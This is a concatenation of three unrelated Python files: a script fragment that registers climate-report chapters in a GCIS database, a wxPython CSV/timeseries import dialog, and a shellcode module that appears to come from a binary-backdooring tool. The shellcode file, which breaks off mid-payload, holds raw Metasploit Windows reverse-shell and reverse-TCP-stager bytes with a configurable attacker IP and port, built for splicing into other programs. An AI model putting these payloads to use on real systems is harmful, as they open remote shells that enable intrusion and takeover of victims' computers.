url = survey['url']
print 'Processing: {b}{url} ({i}/{total})'.format(b=surveys.base_url, url=url, i=i + 1, total=len(survey_list))
s = surveys.get_survey(url)
chp_id = chapters[s.chapter] if s and s.chapter else None
if s:
print s.identifier
print chp_id, s.figure_num, s.title
realized_list.append((chp_id, s.figure_num, s.identifier, s.title, url))
print ''
return realized_list
def create_health_report():
hr = Report({
'identifier': 'usgcrp-climate-human-health-assessment-2016',
'report_type_identifier': 'assessment',
'title': 'The Impacts of Climate Change on Human Health in the United States: A Scientific Assessment',
'url': 'http://www.globalchange.gov/health-assessment',
'publication_year': '2016',
'contact_email': 'healthreport@usgcrp.gov'
})
# ['report_identifier', 'identifier', 'number', 'title', 'url']
chapters = [
('executive-summary', None, 'Executive Summary'),
('climate-change-and-human-health', 1, 'Climate Change and Human Health'),
('temperature-related-death-and-illness', 2, 'Temperature-Related Death and Illness'),
('air-quality-impacts', 3, 'Air Quality Impacts'),
('extreme-events', 4, 'Impacts of Extreme Events on Human Health'),
('vectorborne-diseases', 5, 'Vectorborne Diseases'),
('water-related-illnesses', 6, 'Climate Impacts on Water-Related Illnesses'),
('food-safety--nutrition--and-distribution', 7, 'Food Safety, Nutrition, and Distribution'),
('mental-health-and-well-being', 8, 'Mental Health and Well-Being'),
('populations-of-concern', 9, 'Climate-Health Risk Factors and Populations of Concern'),
('appendix-1--technical-support-document', None, 'Appendix 1: Technical Support Document'),
('appendix-2--process-for-literature-review', None, 'Appendix 2: Process for Literature Review'),
('appendix-3--report-requirements-development-process-review-and-approval', None, 'Appendix 3: Report Requirements, Development Process, Review, and Approval'),
('appendix-4--documenting-uncertainty-confidence-and-likelihood', None, 'Appendix 4: Documenting Uncertainty: Confidence and Likelihood'),
('appendix-5--glossary-and-acronyms', None, 'Appendix 5: Glossary and Acronyms'),
('front-matter', None, 'Front Matter')
]
print gcis.create_report(hr)
for id, num, title in chapters:
ch = Chapter({
'identifier': id,
'number': num,
'title': title,
'report_identifier': hr.identifier
})
print gcis.create_chapter(hr.identifier, ch)
def create_cmip5_report():
cmip = Report({
'identifier': 'noaa-techreport-nesdis-144',
'report_type_identifier': 'report',
'title': 'Regional Surface Climate Conditions in CMIP3 and CMIP5 for the United States: Differences, Similarities, and Implications for the U.S. National Climate Assessment',
'publication_year': '2015'
})
print gcis.create_report(cmip)
chapters = [
('introduction', 1, 'Introduction'),
('data', 2, 'Data'),
('methods', 3, 'Methods'),
('temperature', 4, 'Temperature'),
('precipitation', 5, 'Precipitation'),
('summary', 6, 'Summary'),
('appendix', None, 'Appendix'),
('references', None, 'References'),
('acknowledgements', None, 'Acknowledgements'),
]
for id, num, title in chapters:
ch = Chapter({
'identifier': id,
'number': num,
'title': title,
'report_identifier': cmip.identifier
})
print gcis.create_chapter(cmip.identifier, ch)
if __name__ == '__main__':
    main()
|
|
#!/usr/bin/python
"""
Import Data Frame
Copyright (c) 2014, 2015 Andrew Hawkins
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
"""
Import Declarations
"""
import datetime as dt
import threading as td
import wx
from forsteri.interface import data as idata
from forsteri.interface import sql as isql
from forsteri.process import bring as dec
"""
Constant Declarations
"""
"""
Frame Class
"""
class ImportFrame(wx.Frame):
"""
"""
def __init__(self, *args, **kwargs):
"""
Initialize the frame.
Args:
*args (): Any arguments to be passed directly to the super's
constructor.
**kwargs (): Any keyword arguments to be passed to the super's
constructor.
Returns:
ManagerFrame
"""
## Frame
# Initialize by the parent's constructor.
super(ImportFrame, self).__init__(*args, **kwargs)
# Create the master panel.
masterPanel = wx.Panel(self)
# Create the master sizer.
masterSizer = wx.BoxSizer(wx.VERTICAL)
## File Type
# Create the file static box.
fileSB = wx.StaticBox(masterPanel, label="File Information")
# Create the file sizer.
fileSizer = wx.StaticBoxSizer(fileSB, wx.VERTICAL)
# Create the file type sizer.
fileTypeSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the file type radio buttons.
self.timeseriesRB = wx.RadioButton(masterPanel, label="Timeseries",
style=wx.RB_GROUP)
singleRB = wx.RadioButton(masterPanel, label="Single Time")
# Add the radio buttons to the file type sizer.
fileTypeSizer.AddMany([self.timeseriesRB, (75, 0), singleRB])
# Bind the radio buttons to functions.
self.timeseriesRB.Bind(wx.EVT_RADIOBUTTON, self.onFile)
singleRB.Bind(wx.EVT_RADIOBUTTON, self.onFile)
## Date
# Create the date text sizer.
dateTextSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the static text.
self.dateText = [wx.StaticText(masterPanel, label="Date Format"),
wx.StaticText(masterPanel, label="Year"),
wx.StaticText(masterPanel, label="Month"),
wx.StaticText(masterPanel, label="Day")]
# Add the date text to the date text sizer.
spacers = [(50, 0), (85, 0), (35, 0), (20, 0)]
index = 0
for text in self.dateText:
# Add each static text with a spacer value.
dateTextSizer.AddMany([spacers[index], text])
# Set only the date entry to be disabled.
if index > 0:
text.Disable()
# Increment the index.
index += 1
# Create the date entry sizer.
dateEntrySizer = wx.BoxSizer(wx.HORIZONTAL)
# Get the choices for timeseries selection.
choices = [date[1:] for date in isql.getForVariable("Date") if
date[0] == '$']
        currentDate = dt.date.today()
# Create the date entry forms.
self.dfEntry = wx.ComboBox(masterPanel, size=(150, -1),
choices=choices, style=wx.CB_READONLY|wx.CB_SORT)
self.stEntry = [wx.SpinCtrl(masterPanel, value=str(currentDate.year),
min=2000, max=currentDate.year, size=(75, -1))]
self.stEntry.append(wx.SpinCtrl(masterPanel,
value=str(currentDate.month), min=1, max=12, size=(50, -1)))
self.stEntry.append(wx.SpinCtrl(masterPanel,
value=str(currentDate.day), min=1, max=31, size=(50, -1)))
# Set the initial combo box selection.
self.dfEntry.SetSelection(0)
# Set the date entry forms to be disabled.
for index in range(0, 3):
self.stEntry[index].Disable()
# Bind the combo box selection to a function.
self.dfEntry.Bind(wx.EVT_COMBOBOX, self.onFile)
# Add the date entry items to the sizer.
dateEntrySizer.AddMany([self.dfEntry, (25, 0), self.stEntry[0],
(5, 0), self.stEntry[1], (5, 0), self.stEntry[2]])
## Last Selection
# Create the last selection sizer.
lastSizer = wx.BoxSizer(wx.HORIZONTAL)
## File Picker
# Create the file picker sizer.
filePickerSizer = wx.BoxSizer(wx.VERTICAL)
# Create the file picker text.
filePickerText = wx.StaticText(masterPanel, label="File Location")
# Create the file picker control.
self.filePicker = wx.FilePickerCtrl(masterPanel, path='',
wildcard="CSV files (*.csv)|*.csv|TXT files (*txt)|*.txt",
size=(250, -1), style=wx.FLP_FILE_MUST_EXIST)
self.filePicker.SetInitialDirectory(idata.DATA)
# Add the text and file picker to the file picker sizer.
filePickerSizer.Add(filePickerText, flag=wx.ALIGN_CENTER)
filePickerSizer.Add(self.filePicker, flag=wx.LEFT, border=5)
# Bind the selection of a file to a function.
self.filePicker.Bind(wx.EVT_FILEPICKER_CHANGED, self.onFile)
## Check Boxes
# Create the check sizer.
checkSizer = wx.BoxSizer(wx.VERTICAL)
# Create the check boxes.
self.shiftCheck = wx.CheckBox(masterPanel, label="Shift Week")
self.overwriteCheck = wx.CheckBox(masterPanel, label="Overwrite")
# Initially disable the Walmart week check box.
self.shiftCheck.Disable()
# Bind check boxes to functions.
self.shiftCheck.Bind(wx.EVT_CHECKBOX, self.onFile)
# Add the check boxes to the sizer.
checkSizer.Add(self.shiftCheck, flag=wx.RIGHT|wx.ALIGN_LEFT, border=5)
checkSizer.Add(self.overwriteCheck,
flag=wx.TOP|wx.RIGHT|wx.ALIGN_LEFT, border=5)
# Add the file picker and check sizers to the last sizer.
lastSizer.Add(filePickerSizer)
lastSizer.AddSpacer(25)
lastSizer.Add(checkSizer)
# Add everything to the file sizer.
fileSizer.Add(fileTypeSizer, flag=wx.TOP|wx.ALIGN_CENTER, border=5)
fileSizer.AddSpacer(10)
fileSizer.Add(dateTextSizer, flag=wx.ALIGN_LEFT)
fileSizer.Add(dateEntrySizer, flag=wx.ALIGN_CENTER)
fileSizer.AddSpacer(10)
fileSizer.Add(lastSizer, flag=wx.BOTTOM|wx.ALIGN_CENTER, border=5)
## File Analyzer
# Create the header static box.
headerSB = wx.StaticBox(masterPanel, label="Header Information")
# Create the header sizer.
headerSizer = wx.StaticBoxSizer(headerSB, wx.VERTICAL)
# Create the list control.
self.headerList = wx.ListCtrl(masterPanel, size=(544, 300),
style=wx.LC_REPORT|wx.LC_HRULES|wx.LC_VRULES|wx.BORDER_SUNKEN)
# Add columns to the list control.
self.headerList.InsertColumn(0, "Original", width=170)
self.headerList.InsertColumn(1, "Changed", width=170)
self.headerList.InsertColumn(2, "Reason", width=170)
# Bind double clicking a row to changing its match.
self.headerList.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.onHeader)
# Add the header list to the header sizer.
headerSizer.Add(self.headerList, flag=wx.ALL, border=5)
## Finish Buttons
# Create the finish sizer.
finishSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the buttons.
importButton = wx.Button(masterPanel, label="&Import")
cancelButton = wx.Button(masterPanel, id=wx.ID_CANCEL)
# Set the import button to be the default button.
importButton.SetDefault()
# Add the buttons to the finish sizer.
finishSizer.AddMany([importButton, (5, 0), cancelButton])
# Bind button presses to functions.
importButton.Bind(wx.EVT_BUTTON, self.onImport)
cancelButton.Bind(wx.EVT_BUTTON, self.onCancel)
## Frame Operations
# Add everything to the master sizer.
masterSizer.Add(fileSizer, flag=wx.TOP|wx.ALIGN_CENTER, border=5)
masterSizer.Add(headerSizer, flag=wx.ALL|wx.ALIGN_CENTER, border=5)
masterSizer.Add(finishSizer, flag=wx.RIGHT|wx.BOTTOM|wx.ALIGN_RIGHT,
border=5)
# Set the sizer for the master panel.
masterPanel.SetSizer(masterSizer)
# Bind closing the frame to a function.
self.Bind(wx.EVT_CLOSE, self.onClose)
# Set window properties.
self.SetSize((575, 580))
self.SetTitle("Import Data")
self.Centre()
self.Show(True)
"""
Helper Functions
"""
def displayChange(self, source, dateFormat):
"""
Show the old headers, what they were changed to, and why in the list
control.
Args:
source (str): The location of the file on the disk.
dateFormat (str): The format of the date(s).
Returns:
bool: True if successful, false otherwise.
"""
# Get the shift check.
shift = self.shiftCheck.GetValue()
# Decompose the file and extract the old and new headers.
(oldHeaders, self.newHeaders, self.hasDate, self.firstDate) =\
dec.decompose(source, dateFormat, shift)
# Create missing and ignored boolean lists.
reason = []
index = 0
for header in self.newHeaders:
if header != "Missing" and header != "Ignore":
reason.append("Match")
else:
reason.append(header)
self.newHeaders[index] = ''
# Increment the index.
index += 1
# Remove all items from the list control and reset the index.
self.headerList.DeleteAllItems()
index = 0
# Add the items to the list control.
for oldHeader in oldHeaders:
# Add the items to the list control.
self.headerList.InsertStringItem(index, oldHeader)
if self.newHeaders[index] == "Date":
self.headerList.SetStringItem(index, 1,
str(self.newHeaders[index]) + ": " + str(self.firstDate))
else:
self.headerList.SetStringItem(index, 1,
str(self.newHeaders[index]))
self.headerList.SetStringItem(index, 2, reason[index])
# Increment the index.
index += 1
return True
"""
Event Handler Functions
"""
def onHeader(self, event):
"""
"""
index = event.GetIndex()
data = [self.headerList.GetItemText(index, i) for i in [0, 1, 2]]
if data[2] == "Missing":
headerDlg = HeaderDialog(data, self)
headerDlg.ShowModal()
self.displayChange(self.filePicker.GetPath(),
self.dfEntry.GetValue())
else:
return
def onFile(self, event):
"""
"""
# Enable and disable the necessary widgets.
if self.timeseriesRB.GetValue():
# Enable the timeseries and disable the single time selections.
self.dateText[0].Enable()
self.dfEntry.Enable()
for index in range(0, 3):
self.dateText[index + 1].Disable()
self.stEntry[index].Disable()
# If a date format with week in it is selected enable walmart week.
if 'w' in self.dfEntry.GetValue():
self.shiftCheck.Enable()
else:
self.shiftCheck.Disable()
else:
# Enable the single time and disable the timeseries selections.
self.dateText[0].Disable()
self.dfEntry.Disable()
self.shiftCheck.Disable()
for index in range(0, 3):
self.dateText[index + 1].Enable()
self.stEntry[index].Enable()
# Get the file locations on the disk.
source = self.filePicker.GetPath()
# If the source is an empty string, return.
if source == '':
return
else:
# Route the file type to the proper input function.
if self.timeseriesRB.GetValue():
# Get the value selected for date format from the combo box.
dateFormat = self.dfEntry.GetValue()
else:
# Get the values input for the date of the file.
date = dt.date(self.stEntry[0].GetValue(),
self.stEntry[1].GetValue(), self.stEntry[2].GetValue())
dateFormat = ''
# Display the headers, what they were changed to, and why.
self.displayChange(source, dateFormat)
def onImport(self, event):
"""
"""
# Get the file locations on the disk.
source = self.filePicker.GetPath()
# Get whether or not to overwrite.
overwrite = self.overwriteCheck.GetValue()
# If no source has been selected, show an error message and return.
if source == '':
errorDialog = wx.MessageDialog(self,
"No input file was selected. Please select a file.", "Error",
wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
# Check to make sure there is a date for the file.
if self.timeseriesRB.GetValue():
# Get the value selected for date format from the combo box.
dateFormat = self.dfEntry.GetValue()
if ("Date" in self.newHeaders or self.hasDate) and self.firstDate:
# Check if there is a date in the headers.
if type(self.newHeaders[-1]) == dt.date or\
type(self.newHeaders[-2]) == dt.date:
# Remove any empty strings from the headers list.
self.newHeaders = list(filter(('').__ne__,
self.newHeaders))
# Check if there are any repeat dates.
if len(self.newHeaders) != len(set(self.newHeaders)):
errorDialog = wx.MessageDialog(self,
"There are repeated dates in the header. Please " +
"consider reformatting.", "Error", wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
# Create the variable selection dialog box.
variableDlg = VariableDialog(self)
# Show the variable dialog box.
if variableDlg.ShowModal() == wx.ID_CANCEL:
return
# Get the variable selected.
variable = variableDlg.getSelection()
# Destroy the variable dialog.
variableDlg.Destroy()
# Call the import timeseries function in a thread.
importThread = td.Thread(target=dec.importTimeseries,
args=(source, dateFormat, variable, overwrite))
importThread.start()
self.Close()
else:
# Get the shift check.
shift = self.shiftCheck.GetValue()
# Call the import timeseries function in a thread.
importThread = td.Thread(target=dec.importTimeseries2,
args=(source, dateFormat, overwrite, shift))
importThread.start()
self.Close()
else:
# Bad input for timeseries.
errorDialog = wx.MessageDialog(self,
"There was an issue with the date column(s). Consider " +
"switching to single time or revising the date format.",
"Error",
wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
else:
if "Date" in self.newHeaders or self.hasDate:
# Bad input for single time.
errorDialog = wx.MessageDialog(self,
"There was an issue with the date of the file. Consider " +
"switching to timeseries.",
"Error",
wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
elif len([x for x in self.newHeaders if x != '']) == 1:
# Bad input for single time.
errorDialog = wx.MessageDialog(self,
"There are too few variables to be imported. Consider " +
"switching to timeseries.",
"Error",
wx.OK|wx.ICON_ERROR)
errorDialog.ShowModal()
return
else:
# Get the date from the input.
date = dt.date(*(entry.GetValue() for entry in self.stEntry))
# Call the import timeseries function in a thread.
importThread = td.Thread(target=dec.importSingleTime,
args=(source, date, overwrite))
importThread.start()
self.Close()
"""
Helper Functions
"""
def convertVariable(self, variable):
"""
"""
varTemp = variable
return varTemp.replace(' ', '_').lower()
"""
Event Handler Functions
"""
def onCancel(self, event):
"""
"""
self.Close()
def onClose(self, event):
"""
"""
self.Destroy()
class VariableDialog(wx.Dialog):
"""
"""
def __init__(self, *args, **kwargs):
"""
"""
# Initialize by the parent's constructor.
super(VariableDialog, self).__init__(*args, **kwargs)
# Create the master panel.
masterPanel = wx.Panel(self)
# Create the master sizer.
masterSizer = wx.BoxSizer(wx.VERTICAL)
# Create the text to inform the user.
text = wx.StaticText(masterPanel, label="Please select the " +\
"appropriate variable that\n\t\t represents the file.")
# Get the list of variable choices.
choices = self.getChoices()
# Create the variable combo box.
self.varCombo = wx.ComboBox(masterPanel, size=(150, -1),
choices=choices, style=wx.CB_READONLY|wx.CB_SORT)
# Set the initial combo box selection.
self.varCombo.SetSelection(0)
# Create the finish sizer.
finishSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the finish buttons.
okButton = wx.Button(masterPanel, id=wx.ID_OK)
cancelButton = wx.Button(masterPanel, id=wx.ID_CANCEL)
# Add the finish buttons to the sizer.
finishSizer.AddMany([okButton, (5, 0), cancelButton])
# Add the text and combo box to the sizer.
masterSizer.Add(text, flag=wx.LEFT|wx.RIGHT|wx.TOP|wx.ALIGN_CENTER,
border=5)
masterSizer.AddSpacer(10)
masterSizer.Add(self.varCombo, flag=wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER,
border=5)
masterSizer.AddSpacer(9)
masterSizer.Add(wx.StaticLine(masterPanel, size=(290, 2)),
flag=wx.ALIGN_CENTER)
masterSizer.AddSpacer(9)
masterSizer.Add(finishSizer, flag=wx.RIGHT|wx.BOTTOM|wx.ALIGN_RIGHT,
border=5)
# Set the master sizer.
masterPanel.SetSizer(masterSizer)
# Set the size of the window.
self.SetSize((300, 155))
def getChoices(self):
"""
"""
# Get the list of variables.
variables = isql.getVariables()
        # Convert each variable to be aesthetically pleasing.
#variables = [variable.replace('_', ' ').title() for variable in\
# variables]
return variables
def getSelection(self):
"""
"""
# Get the value of the variable combo box.
return self.varCombo.GetValue()
class HeaderDialog(wx.Dialog):
"""
"""
def __init__(self, data, *args, **kwargs):
"""
"""
# Initialize by the parent's constructor.
super(HeaderDialog, self).__init__(*args, **kwargs)
# Create the master panel.
masterPanel = wx.Panel(self)
# Create the master sizer.
masterSizer = wx.BoxSizer(wx.VERTICAL)
# Create the text values.
text = wx.StaticText(masterPanel, label='Change "' + data[0] + '" to')
# Create the combo box for change selection.
self.changeCB = wx.ComboBox(masterPanel, value=data[1],
choices=isql.getVariables())
# Create the finish sizer.
finishSizer = wx.BoxSizer(wx.HORIZONTAL)
# Create the finish buttons.
okButton = wx.Button(masterPanel, id=wx.ID_OK)
cancelButton = wx.Button(masterPanel, id=wx.ID_CANCEL)
# Bind buttons to actions.
okButton.Bind(wx.EVT_BUTTON, self.onOK)
# Add the finish buttons to the sizer.
finishSizer.AddMany([okButton, (5, 0), cancelButton])
# Add everything to the master sizer.
masterSizer.Add(text, flag=wx.ALL|wx.ALIGN_CENTER, border=5)
masterSizer.Add(self.changeCB, flag=wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER,
border=5)
masterSizer.AddSpacer(9)
masterSizer.Add(wx.StaticLine(masterPanel, size=(290, 2)),
flag=wx.ALIGN_CENTER)
masterSizer.AddSpacer(9)
masterSizer.Add(finishSizer, flag=wx.RIGHT|wx.BOTTOM|wx.ALIGN_RIGHT,
border=5)
# Set the alias.
self.alias = data[0]
# Set the master sizer.
masterPanel.SetSizer(masterSizer)
# Set the size of the window.
self.SetSize((300, 150))
def onOK(self, event):
"""
"""
isql.addAlias(self.changeCB.GetStringSelection(), self.alias)
self.EndModal(wx.ID_OK)
"""
Start Application
"""
def main():
"""
When the file is called independently create and display the manager frame.
"""
app = wx.App()
ImportFrame(None, style=wx.DEFAULT_FRAME_STYLE^wx.RESIZE_BORDER)
app.MainLoop()
if __name__ == '__main__':
main()
|
|
"""
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import struct
class winI32_shellcode():
"""
Windows Intel x32 shellcode class
"""
def __init__(self, host, port, supplied_shellcode):
# could take this out HOST/PORT and put into each shellcode function
self.host = host
self.port = port
self.supplied_shellcode = supplied_shellcode
self.shellcode1 = None
self.shellcode2 = None
self.hostip = None
self.stackpreserve = b"\x90\x90\x60\x9c"
self.stackrestore = b"\x9d\x61"
def __pack_ip_addresses(self):
hostocts = []
for i, octet in enumerate(self.host.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
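    # Example with a made-up address: '10.0.0.1' packs to b'\x0a\x00\x00\x01',
    # which the payload builders below splice in where the hard-coded IP bytes
    # would otherwise go; the port is packed separately with struct.pack('!H', port).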
def reverse_shell_tcp(self):
"""
metasploit windows/shell_reverse_tcp
"""
self.shellcode1 = b"\xfc\xe8"
self.shellcode1 += b"\x89\x00\x00\x00"
self.shellcode1 += (b"\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
b"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
b"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
b"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
)
self.shellcode2 = (b"\x5d\x68\x33\x32\x00\x00\x68"
b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
b"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
b"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
b"\x68"
)
self.shellcode2 += self.__pack_ip_addresses() # IP
self.shellcode2 += b"\x68\x02\x00"
self.shellcode2 += struct.pack('!H', self.port) # PORT
self.shellcode2 += (b"\x89\xe6\x6a\x10\x56"
b"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
b"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
b"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
b"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
# The NOP in the line below allows for continued execution.
b"\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
b"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
b"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
b"\x81\xc4\xfc\x01\x00\x00"
)
return self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
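    # Layout note: the pusha/pushf bytes in self.stackpreserve and the popf/popa
    # bytes in self.stackrestore bracket the payload so the host program's
    # registers and flags are restored and execution can continue afterwards.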
def reverse_tcp_stager_threaded(self):
"""
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
self.shellcode2 = b"\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += (b"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
b"\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
b"\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
b"\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
b"\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
b"\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
b"\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
b"\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
b"\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
b"\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
b"\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
b"\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
b"\x97\x6A\x05\x68"
)
self.shellcode2 += self.__pack_ip_addresses() # IP
self.shellcode2 += b"\x68\x02\x00"
self.shellcode2 += struct.pack('!H', self.port)
self.shellcode2 += (b"\x89\xE6\x6A"
b"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
b"\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
b"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
b"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
b"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
)
        # shellcode1: stub that allocates memory, copies shellcode2 in, and starts it in a new thread
self.shellcode1 = (b"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
b"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
b"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
b"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
b"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
b"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
b"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
b"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
b"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
b"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
b"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
b"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
b"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
b"\x5D\x90"
b"\xBE")
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += (b"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
b"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
b"\x89\xF1"
)
self.shellcode1 += b"\xeb\x44" # <--length of shellcode below
self.shellcode1 += b"\x90\x5e"
self.shellcode1 += (b"\x90\x90\x90"
b"\xF2\xA4"
b"\xE8\x20\x00\x00"
b"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
